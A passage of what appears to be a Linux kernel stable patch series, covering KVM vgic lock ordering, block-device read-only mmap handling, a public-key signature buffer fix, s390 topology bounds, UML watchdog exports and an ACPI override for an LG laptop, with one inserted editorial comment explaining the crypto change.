+ out:
+ 	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index c9a03033d5077..00ad6587bee9a 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1936,6 +1936,7 @@ void vgic_lpi_translation_cache_destroy(struct kvm *kvm)
+ 
+ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ {
++	int ret;
+ 	struct vgic_its *its;
+ 
+ 	if (type != KVM_DEV_TYPE_ARM_VGIC_ITS)
+@@ -1945,9 +1946,12 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	if (!its)
+ 		return -ENOMEM;
+ 
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (vgic_initialized(dev->kvm)) {
+-		int ret = vgic_v4_init(dev->kvm);
++		ret = vgic_v4_init(dev->kvm);
+ 		if (ret < 0) {
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			kfree(its);
+ 			return ret;
+ 		}
+@@ -1960,12 +1964,10 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 
+ 	/* Yep, even more trickery for lock ordering... */
+ #ifdef CONFIG_LOCKDEP
+-	mutex_lock(&dev->kvm->arch.config_lock);
+ 	mutex_lock(&its->cmd_lock);
+ 	mutex_lock(&its->its_lock);
+ 	mutex_unlock(&its->its_lock);
+ 	mutex_unlock(&its->cmd_lock);
+-	mutex_unlock(&dev->kvm->arch.config_lock);
+ #endif
+ 
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+@@ -1986,7 +1988,11 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 
+ 	dev->private = its;
+ 
+-	return vgic_its_set_abi(its, NR_ITS_ABIS - 1);
++	ret = vgic_its_set_abi(its, NR_ITS_ABIS - 1);
++
++	mutex_unlock(&dev->kvm->arch.config_lock);
++
++	return ret;
+ }
+ 
+ static void vgic_its_destroy(struct kvm_device *kvm_dev)
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index 07e727023deb7..bf4b3d9631ce1 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -102,7 +102,11 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->arch.config_lock);
++	/*
++	 * Since we can't hold config_lock while registering the redistributor
++	 * iodevs, take the slots_lock immediately.
++	 */
++	mutex_lock(&kvm->slots_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -182,6 +186,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	if (r)
+ 		goto out;
+ 
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (write) {
+ 		r = vgic_check_iorange(kvm, *addr_ptr, addr, alignment, size);
+ 		if (!r)
+@@ -189,9 +194,10 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	} else {
+ 		addr = *addr_ptr;
+ 	}
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ out:
+-	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->slots_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 472b18ac92a24..188d2187eede9 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -769,10 +769,13 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	struct vgic_io_device *rd_dev = &vcpu->arch.vgic_cpu.rd_iodev;
+ 	struct vgic_redist_region *rdreg;
+ 	gpa_t rd_base;
+-	int ret;
++	int ret = 0;
++
++	lockdep_assert_held(&kvm->slots_lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (!IS_VGIC_ADDR_UNDEF(vgic_cpu->rd_iodev.base_addr))
+-		return 0;
++		goto out_unlock;
+ 
+ 	/*
+ 	 * We may be creating VCPUs before having set the base address for the
+@@ -782,10 +785,12 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	 */
+ 	rdreg = vgic_v3_rdist_free_slot(&vgic->rd_regions);
+ 	if (!rdreg)
+-		return 0;
++		goto out_unlock;
+ 
+-	if (!vgic_v3_check_base(kvm))
+-		return -EINVAL;
++	if (!vgic_v3_check_base(kvm)) {
++		ret = -EINVAL;
++		goto out_unlock;
++	}
+ 
+ 	vgic_cpu->rdreg = rdreg;
+ 	vgic_cpu->rdreg_index = rdreg->free_index;
+@@ -799,16 +804,20 @@ int vgic_register_redist_iodev(struct kvm_vcpu *vcpu)
+ 	rd_dev->nr_regions = ARRAY_SIZE(vgic_v3_rd_registers);
+ 	rd_dev->redist_vcpu = vcpu;
+ 
+-	mutex_lock(&kvm->slots_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++
+ 	ret = kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, rd_base,
+ 				      2 * SZ_64K, &rd_dev->dev);
+-	mutex_unlock(&kvm->slots_lock);
+-
+ 	if (ret)
+ 		return ret;
+ 
++	/* Protected by slots_lock */
+ 	rdreg->free_index++;
+ 	return 0;
++
++out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
++	return ret;
+ }
+ 
+ static void vgic_unregister_redist_iodev(struct kvm_vcpu *vcpu)
+@@ -834,12 +843,10 @@ static int vgic_register_all_redist_iodevs(struct kvm *kvm)
+ 		/* The current c failed, so iterate over the previous ones. */
+ 		int i;
+ 
+-		mutex_lock(&kvm->slots_lock);
+ 		for (i = 0; i < c; i++) {
+ 			vcpu = kvm_get_vcpu(kvm, i);
+ 			vgic_unregister_redist_iodev(vcpu);
+ 		}
+-		mutex_unlock(&kvm->slots_lock);
+ 	}
+ 
+ 	return ret;
+@@ -938,7 +945,9 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ {
+ 	int ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
+ 	ret = vgic_v3_alloc_redist_region(kvm, index, addr, count);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -950,8 +959,10 @@ int vgic_v3_set_redist_base(struct kvm *kvm, u32 index, u64 addr, u32 count)
+ 	if (ret) {
+ 		struct vgic_redist_region *rdreg;
+ 
++		mutex_lock(&kvm->arch.config_lock);
+ 		rdreg = vgic_v3_rdist_region_from_index(kvm, index);
+ 		vgic_v3_free_redist_region(rdreg);
++		mutex_unlock(&kvm->arch.config_lock);
+ 		return ret;
+ 	}
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index a95f99b93dd68..eb5c58d785b99 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -1093,7 +1093,6 @@ int vgic_register_dist_iodev(struct kvm *kvm, gpa_t dist_base_address,
+ 			     enum vgic_type type)
+ {
+ 	struct vgic_io_device *io_device = &kvm->arch.vgic.dist_iodev;
+-	int ret = 0;
+ 	unsigned int len;
+ 
+ 	switch (type) {
+@@ -1111,10 +1110,6 @@ int vgic_register_dist_iodev(struct kvm *kvm, gpa_t dist_base_address,
+ 	io_device->iodev_type = IODEV_DIST;
+ 	io_device->redist_vcpu = NULL;
+ 
+-	mutex_lock(&kvm->slots_lock);
+-	ret = kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, dist_base_address,
+-				      len, &io_device->dev);
+-	mutex_unlock(&kvm->slots_lock);
+-
+-	return ret;
++	return kvm_io_bus_register_dev(kvm, KVM_MMIO_BUS, dist_base_address,
++				       len, &io_device->dev);
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-v2.c b/arch/arm64/kvm/vgic/vgic-v2.c
+index 645648349c99b..7e9cdb78f7ce8 100644
+--- a/arch/arm64/kvm/vgic/vgic-v2.c
++++ b/arch/arm64/kvm/vgic/vgic-v2.c
+@@ -312,12 +312,6 @@ int vgic_v2_map_resources(struct kvm *kvm)
+ 		return ret;
+ 	}
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist->vgic_dist_base, VGIC_V2);
+-	if (ret) {
+-		kvm_err("Unable to register VGIC MMIO regions\n");
+-		return ret;
+-	}
+-
+ 	if (!static_branch_unlikely(&vgic_v2_cpuif_trap)) {
+ 		ret = kvm_phys_addr_ioremap(kvm, dist->vgic_cpu_base,
+ 					    kvm_vgic_global_state.vcpu_base,
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index 5bdada3137287..f86c3007a319c 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -538,7 +538,6 @@ int vgic_v3_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	struct kvm_vcpu *vcpu;
+-	int ret = 0;
+ 	unsigned long c;
+ 
+ 	kvm_for_each_vcpu(c, vcpu, kvm) {
+@@ -568,12 +567,6 @@ int vgic_v3_map_resources(struct kvm *kvm)
+ 		return -EBUSY;
+ 	}
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist->vgic_dist_base, VGIC_V3);
+-	if (ret) {
+-		kvm_err("Unable to register VGICv3 dist MMIO regions\n");
+-		return ret;
+-	}
+-
+ 	if (kvm_vgic_global_state.has_gicv4_1)
+ 		vgic_v4_configure_vsgis(kvm);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index 3bb0034780605..c1c28fe680ba3 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -184,13 +184,14 @@ static void vgic_v4_disable_vsgis(struct kvm_vcpu *vcpu)
+ 	}
+ }
+ 
+-/* Must be called with the kvm lock held */
+ void vgic_v4_configure_vsgis(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	kvm_arm_halt_guest(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 4ee20280133e4..2fef1fa93e7b6 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -480,8 +480,8 @@ static void do_bad_area(unsigned long far, unsigned long esr,
+ 	}
+ }
+ 
+-#define VM_FAULT_BADMAP		0x010000
+-#define VM_FAULT_BADACCESS	0x020000
++#define VM_FAULT_BADMAP		((__force vm_fault_t)0x010000)
++#define VM_FAULT_BADACCESS	((__force vm_fault_t)0x020000)
+ 
+ static vm_fault_t __do_page_fault(struct mm_struct *mm, unsigned long addr,
+ 				  unsigned int mm_flags, unsigned long vm_flags,
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index efba867017e22..97b026130c71b 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -311,13 +311,22 @@ static void tce_free_pSeriesLP(unsigned long liobn, long tcenum, long tceshift,
+ static void tce_freemulti_pSeriesLP(struct iommu_table *tbl, long tcenum, long npages)
+ {
+ 	u64 rc;
++	long rpages = npages;
++	unsigned long limit;
+ 
+ 	if (!firmware_has_feature(FW_FEATURE_STUFF_TCE))
+ 		return tce_free_pSeriesLP(tbl->it_index, tcenum,
+ 					  tbl->it_page_shift, npages);
+ 
+-	rc = plpar_tce_stuff((u64)tbl->it_index,
+-			     (u64)tcenum << tbl->it_page_shift, 0, npages);
++	do {
++		limit = min_t(unsigned long, rpages, 512);
++
++		rc = plpar_tce_stuff((u64)tbl->it_index,
++				     (u64)tcenum << tbl->it_page_shift, 0, limit);
++
++		rpages -= limit;
++		tcenum += limit;
++	} while (rpages > 0 && !rc);
+ 
+ 	if (rc && printk_ratelimit()) {
+ 		printk("tce_freemulti_pSeriesLP: plpar_tce_stuff failed\n");
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index e34d7809f6c9f..bd8e80936f44d 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -91,7 +91,7 @@ static unsigned long ndump = 64;
+ static unsigned long nidump = 16;
+ static unsigned long ncsum = 4096;
+ static int termch;
+-static char tmpstr[128];
++static char tmpstr[KSYM_NAME_LEN];
+ static int tracing_enabled;
+ 
+ static long bus_error_jmp[JMP_BUF_LEN];
+diff --git a/arch/riscv/include/asm/perf_event.h b/arch/riscv/include/asm/perf_event.h
+index d42c901f9a977..665bbc9b2f840 100644
+--- a/arch/riscv/include/asm/perf_event.h
++++ b/arch/riscv/include/asm/perf_event.h
+@@ -10,4 +10,11 @@
+ 
+ #include <linux/perf_event.h>
+ #define perf_arch_bpf_user_pt_regs(regs) (struct user_regs_struct *)regs
++
++#define perf_arch_fetch_caller_regs(regs, __ip) { \
++	(regs)->epc = (__ip); \
++	(regs)->s0 = (unsigned long) __builtin_frame_address(0); \
++	(regs)->sp = current_stack_pointer; \
++	(regs)->status = SR_PP; \
++}
+ #endif /* _ASM_RISCV_PERF_EVENT_H */
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 6315a3c942259..2b9906ed2d1d1 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -845,9 +845,9 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+ static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
++#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-#ifndef CONFIG_BUILTIN_DTB
+ 	/* Make sure the fdt fixmap address is always aligned on PMD size */
+ 	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+diff --git a/arch/s390/kernel/topology.c b/arch/s390/kernel/topology.c
+index c6eecd4a5302d..10b20aeb27d3b 100644
+--- a/arch/s390/kernel/topology.c
++++ b/arch/s390/kernel/topology.c
+@@ -95,7 +95,7 @@ out:
+ static void cpu_thread_map(cpumask_t *dst, unsigned int cpu)
+ {
+ 	static cpumask_t mask;
+-	int i;
++	unsigned int max_cpu;
+ 
+ 	cpumask_clear(&mask);
+ 	if (!cpumask_test_cpu(cpu, &cpu_setup_mask))
+@@ -104,9 +104,10 @@ static void cpu_thread_map(cpumask_t *dst, unsigned int cpu)
+ 	if (topology_mode != TOPOLOGY_MODE_HW)
+ 		goto out;
+ 	cpu -= cpu % (smp_cpu_mtid + 1);
+-	for (i = 0; i <= smp_cpu_mtid; i++) {
+-		if (cpumask_test_cpu(cpu + i, &cpu_setup_mask))
+-			cpumask_set_cpu(cpu + i, &mask);
++	max_cpu = min(cpu + smp_cpu_mtid, nr_cpu_ids - 1);
++	for (; cpu <= max_cpu; cpu++) {
++		if (cpumask_test_cpu(cpu, &cpu_setup_mask))
++			cpumask_set_cpu(cpu, &mask);
+ 	}
+ out:
+ 	cpumask_copy(dst, &mask);
+@@ -123,25 +124,26 @@ static void add_cpus_to_mask(struct topology_core *tl_core,
+ 	unsigned int core;
+ 
+ 	for_each_set_bit(core, &tl_core->mask, TOPOLOGY_CORE_BITS) {
+-		unsigned int rcore;
+-		int lcpu, i;
++		unsigned int max_cpu, rcore;
++		int cpu;
+ 
+ 		rcore = TOPOLOGY_CORE_BITS - 1 - core + tl_core->origin;
+-		lcpu = smp_find_processor_id(rcore << smp_cpu_mt_shift);
+-		if (lcpu < 0)
++		cpu = smp_find_processor_id(rcore << smp_cpu_mt_shift);
++		if (cpu < 0)
+ 			continue;
+-		for (i = 0; i <= smp_cpu_mtid; i++) {
+-			topo = &cpu_topology[lcpu + i];
++		max_cpu = min(cpu + smp_cpu_mtid, nr_cpu_ids - 1);
++		for (; cpu <= max_cpu; cpu++) {
++			topo = &cpu_topology[cpu];
+ 			topo->drawer_id = drawer->id;
+ 			topo->book_id = book->id;
+ 			topo->socket_id = socket->id;
+ 			topo->core_id = rcore;
+-			topo->thread_id = lcpu + i;
++			topo->thread_id = cpu;
+ 			topo->dedicated = tl_core->d;
+-			cpumask_set_cpu(lcpu + i, &drawer->mask);
+-			cpumask_set_cpu(lcpu + i, &book->mask);
+-			cpumask_set_cpu(lcpu + i, &socket->mask);
+-			smp_cpu_set_polarization(lcpu + i, tl_core->pp);
++			cpumask_set_cpu(cpu, &drawer->mask);
++			cpumask_set_cpu(cpu, &book->mask);
++			cpumask_set_cpu(cpu, &socket->mask);
++			smp_cpu_set_polarization(cpu, tl_core->pp);
+ 		}
+ 	}
+ }
+diff --git a/arch/um/drivers/Makefile b/arch/um/drivers/Makefile
+index e1dc4292bd22e..65b449c992d2c 100644
+--- a/arch/um/drivers/Makefile
++++ b/arch/um/drivers/Makefile
+@@ -16,7 +16,8 @@ mconsole-objs := mconsole_kern.o mconsole_user.o
+ hostaudio-objs := hostaudio_kern.o
+ ubd-objs := ubd_kern.o ubd_user.o
+ port-objs := port_kern.o port_user.o
+-harddog-objs := harddog_kern.o harddog_user.o
++harddog-objs := harddog_kern.o
++harddog-builtin-$(CONFIG_UML_WATCHDOG) := harddog_user.o harddog_user_exp.o
+ rtc-objs := rtc_kern.o rtc_user.o
+ 
+ LDFLAGS_pcap.o = $(shell $(CC) $(KBUILD_CFLAGS) -print-file-name=libpcap.a)
+@@ -60,6 +61,7 @@ obj-$(CONFIG_PTY_CHAN) += pty.o
+ obj-$(CONFIG_TTY_CHAN) += tty.o 
+ obj-$(CONFIG_XTERM_CHAN) += xterm.o xterm_kern.o
+ obj-$(CONFIG_UML_WATCHDOG) += harddog.o
++obj-y += $(harddog-builtin-y) $(harddog-builtin-m)
+ obj-$(CONFIG_BLK_DEV_COW_COMMON) += cow_user.o
+ obj-$(CONFIG_UML_RANDOM) += random.o
+ obj-$(CONFIG_VIRTIO_UML) += virtio_uml.o
+diff --git a/arch/um/drivers/harddog.h b/arch/um/drivers/harddog.h
+new file mode 100644
+index 0000000000000..6d9ea60e7133e
+--- /dev/null
++++ b/arch/um/drivers/harddog.h
+@@ -0,0 +1,9 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef UM_WATCHDOG_H
++#define UM_WATCHDOG_H
++
++int start_watchdog(int *in_fd_ret, int *out_fd_ret, char *sock);
++void stop_watchdog(int in_fd, int out_fd);
++int ping_watchdog(int fd);
++
++#endif /* UM_WATCHDOG_H */
+diff --git a/arch/um/drivers/harddog_kern.c b/arch/um/drivers/harddog_kern.c
+index e6d4f43deba82..60d1c6cab8a95 100644
+--- a/arch/um/drivers/harddog_kern.c
++++ b/arch/um/drivers/harddog_kern.c
+@@ -47,6 +47,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/uaccess.h>
+ #include "mconsole.h"
++#include "harddog.h"
+ 
+ MODULE_LICENSE("GPL");
+ 
+@@ -60,8 +61,6 @@ static int harddog_out_fd = -1;
+  *	Allow only one person to hold it open
+  */
+ 
+-extern int start_watchdog(int *in_fd_ret, int *out_fd_ret, char *sock);
+-
+ static int harddog_open(struct inode *inode, struct file *file)
+ {
+ 	int err = -EBUSY;
+@@ -92,8 +91,6 @@ err:
+ 	return err;
+ }
+ 
+-extern void stop_watchdog(int in_fd, int out_fd);
+-
+ static int harddog_release(struct inode *inode, struct file *file)
+ {
+ 	/*
+@@ -112,8 +109,6 @@ static int harddog_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-extern int ping_watchdog(int fd);
+-
+ static ssize_t harddog_write(struct file *file, const char __user *data, size_t len,
+ 			     loff_t *ppos)
+ {
+diff --git a/arch/um/drivers/harddog_user.c b/arch/um/drivers/harddog_user.c
+index 070468d22e394..9ed89304975ed 100644
+--- a/arch/um/drivers/harddog_user.c
++++ b/arch/um/drivers/harddog_user.c
+@@ -7,6 +7,7 @@
+ #include <unistd.h>
+ #include <errno.h>
+ #include <os.h>
++#include "harddog.h"
+ 
+ struct dog_data {
+ 	int stdin_fd;
+diff --git a/arch/um/drivers/harddog_user_exp.c b/arch/um/drivers/harddog_user_exp.c
+new file mode 100644
+index 0000000000000..c74d4b815d143
+--- /dev/null
++++ b/arch/um/drivers/harddog_user_exp.c
+@@ -0,0 +1,9 @@
++// SPDX-License-Identifier: GPL-2.0
++#include <linux/export.h>
++#include "harddog.h"
++
++#if IS_MODULE(CONFIG_UML_WATCHDOG)
++EXPORT_SYMBOL(start_watchdog);
++EXPORT_SYMBOL(stop_watchdog);
++EXPORT_SYMBOL(ping_watchdog);
++#endif
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index d7af225b63d89..f48ab047b41d4 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -10829,6 +10829,9 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
+ 			exit_fastpath = EXIT_FASTPATH_EXIT_HANDLED;
+ 			break;
+ 		}
++
++		/* Note, VM-Exits that go down the "slow" path are accounted below. */
++		++vcpu->stat.exits;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/mm/pat/memtype.c b/arch/x86/mm/pat/memtype.c
+index 2642bc4c8ec07..66a209f7eb86d 100644
+--- a/arch/x86/mm/pat/memtype.c
++++ b/arch/x86/mm/pat/memtype.c
+@@ -434,8 +434,7 @@ static unsigned long pat_x_mtrr_type(u64 start, u64 end,
+ 		u8 mtrr_type, uniform;
+ 
+ 		mtrr_type = mtrr_type_lookup(start, end, &uniform);
+-		if (mtrr_type != MTRR_TYPE_WRBACK &&
+-		    mtrr_type != MTRR_TYPE_INVALID)
++		if (mtrr_type != MTRR_TYPE_WRBACK)
+ 			return _PAGE_CACHE_MODE_UC_MINUS;
+ 
+ 		return _PAGE_CACHE_MODE_WB;
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 8ac1038d0c797..291cf9df7fc29 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -909,6 +909,7 @@ static bool disk_has_partitions(struct gendisk *disk)
+ void disk_set_zoned(struct gendisk *disk, enum blk_zoned_model model)
+ {
+ 	struct request_queue *q = disk->queue;
++	unsigned int old_model = q->limits.zoned;
+ 
+ 	switch (model) {
+ 	case BLK_ZONED_HM:
+@@ -946,7 +947,7 @@ void disk_set_zoned(struct gendisk *disk, enum blk_zoned_model model)
+ 		 */
+ 		blk_queue_zone_write_granularity(q,
+ 						queue_logical_block_size(q));
+-	} else {
++	} else if (old_model != BLK_ZONED_NONE) {
+ 		disk_clear_zone_settings(disk);
+ 	}
+ }
+diff --git a/block/fops.c b/block/fops.c
+index e406aa605327e..6197d1c41652d 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -685,6 +685,16 @@ static long blkdev_fallocate(struct file *file, int mode, loff_t start,
+ 	return error;
+ }
+ 
++static int blkdev_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct inode *bd_inode = bdev_file_inode(file);
++
++	if (bdev_read_only(I_BDEV(bd_inode)))
++		return generic_file_readonly_mmap(file, vma);
++
++	return generic_file_mmap(file, vma);
++}
++
+ const struct file_operations def_blk_fops = {
+ 	.open		= blkdev_open,
+ 	.release	= blkdev_close,
+@@ -692,7 +702,7 @@ const struct file_operations def_blk_fops = {
+ 	.read_iter	= blkdev_read_iter,
+ 	.write_iter	= blkdev_write_iter,
+ 	.iopoll		= iocb_bio_iopoll,
+-	.mmap		= generic_file_mmap,
++	.mmap		= blkdev_mmap,
+ 	.fsync		= blkdev_fsync,
+ 	.unlocked_ioctl	= blkdev_ioctl,
+ #ifdef CONFIG_COMPAT
+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index eca5671ad3f22..50c933f86b218 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -380,9 +380,10 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 	struct crypto_wait cwait;
+ 	struct crypto_akcipher *tfm;
+ 	struct akcipher_request *req;
+-	struct scatterlist src_sg[2];
++	struct scatterlist src_sg;
+ 	char alg_name[CRYPTO_MAX_ALG_NAME];
+-	char *key, *ptr;
++	char *buf, *ptr;
++	size_t buf_len;
+ 	int ret;
+ 
+ 	pr_devel("==>%s()\n", __func__);
+@@ -420,34 +421,37 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 	if (!req)
+ 		goto error_free_tfm;
+ 
+-	key = kmalloc(pkey->keylen + sizeof(u32) * 2 + pkey->paramlen,
+-		      GFP_KERNEL);
+-	if (!key)
++	buf_len = max_t(size_t, pkey->keylen + sizeof(u32) * 2 + pkey->paramlen,
++			sig->s_size + sig->digest_size);
++
++	buf = kmalloc(buf_len, GFP_KERNEL);
++	if (!buf)
+ 		goto error_free_req;
+ 
+-	memcpy(key, pkey->key, pkey->keylen);
+-	ptr = key + pkey->keylen;
++	memcpy(buf, pkey->key, pkey->keylen);
++	ptr = buf + pkey->keylen;
+ 	ptr = pkey_pack_u32(ptr, pkey->algo);
+ 	ptr = pkey_pack_u32(ptr, pkey->paramlen);
+ 	memcpy(ptr, pkey->params, pkey->paramlen);
+ 
+ 	if (pkey->key_is_private)
+-		ret = crypto_akcipher_set_priv_key(tfm, key, pkey->keylen);
++		ret = crypto_akcipher_set_priv_key(tfm, buf, pkey->keylen);
+ 	else
+-		ret = crypto_akcipher_set_pub_key(tfm, key, pkey->keylen);
++		ret = crypto_akcipher_set_pub_key(tfm, buf, pkey->keylen);
+ 	if (ret)
+-		goto error_free_key;
++		goto error_free_buf;
+ 
+ 	if (strcmp(pkey->pkey_algo, "sm2") == 0 && sig->data_size) {
+ 		ret = cert_sig_digest_update(sig, tfm);
+ 		if (ret)
+-			goto error_free_key;
++			goto error_free_buf;
+ 	}
+ 
+-	sg_init_table(src_sg, 2);
+-	sg_set_buf(&src_sg[0], sig->s, sig->s_size);
+-	sg_set_buf(&src_sg[1], sig->digest, sig->digest_size);
+-	akcipher_request_set_crypt(req, src_sg, NULL, sig->s_size,
++	memcpy(buf, sig->s, sig->s_size);
++	memcpy(buf + sig->s_size, sig->digest, sig->digest_size);
++
++	sg_init_one(&src_sg, buf, sig->s_size + sig->digest_size);
++	akcipher_request_set_crypt(req, &src_sg, NULL, sig->s_size,
+ 				   sig->digest_size);
+ 	crypto_init_wait(&cwait);
+ 	akcipher_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG |
+@@ -455,8 +459,8 @@ int public_key_verify_signature(const struct public_key *pkey,
+ 				      crypto_req_done, &cwait);
+ 	ret = crypto_wait_req(crypto_akcipher_verify(req), &cwait);
+ 
+-error_free_key:
+-	kfree(key);
++error_free_buf:
++	kfree(buf);
+ error_free_req:
+ 	akcipher_request_free(req);
+ error_free_tfm:
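
[Editorial note, not part of the patch above.] The hunk folds the signature and digest into one kmalloc'ed buffer mapped with sg_init_one() instead of a two-entry scatterlist over the caller's pointers. The assumption behind it: sg_set_buf() translates the address with virt_to_page(), which is only valid for linearly mapped memory, while sig->s and sig->digest may point at stack or vmalloc memory depending on the caller. A minimal sketch of packing two ranges into one sg-safe entry (a/alen and b/blen are hypothetical inputs):

	struct scatterlist sg;
	u8 *buf;

	buf = kmalloc(alen + blen, GFP_KERNEL);
	if (!buf)
		return -ENOMEM;
	memcpy(buf, a, alen);
	memcpy(buf + alen, b, blen);
	/* one contiguous, kmalloc-backed (hence mappable) entry */
	sg_init_one(&sg, buf, alen + blen);
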
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index d08818baea88f..a7f12bdbc5e25 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -502,6 +502,17 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 	{ }
+ };
+ 
++static const struct dmi_system_id lg_laptop[] = {
++	{
++		.ident = "LG Electronics 17U70P",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LG Electronics"),
++			DMI_MATCH(DMI_BOARD_NAME, "17U70P"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -518,6 +529,7 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ 	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ lg_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
